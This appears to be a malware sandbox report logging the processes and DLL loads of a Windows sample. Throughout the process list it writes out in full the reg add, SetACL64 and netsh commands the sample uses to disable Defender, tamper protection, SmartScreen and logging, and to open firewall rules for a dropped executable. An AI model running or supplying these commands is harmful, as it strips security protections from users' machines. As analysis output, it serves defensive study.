Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=in action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,private	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name=oofzzwcvgbcojt dir=out action=allow program="C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\oofzzwcvgbcojt.exe" enable=yes profile=public,private	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn.bat	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\bn1.bat	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\nsv4B6.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /f	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown	Jump to behavior

Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\4hIPvzV6a2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: onex.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: eappprxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: hnetmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netshell.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netsetupapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: netiohlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: activeds.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: polstore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winipsec.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: nshwfp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2pnetsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: p2p.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rpcnsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: whhelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlancfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wlanapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wshelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: peerdistsh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wcmapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mobilenetworking.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprmsg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: ifmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasmontr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: mfc42u.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: authfwcfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dhcpcmonitor.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3cfg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Section loaded: dot3api.dll	Jump to behavior
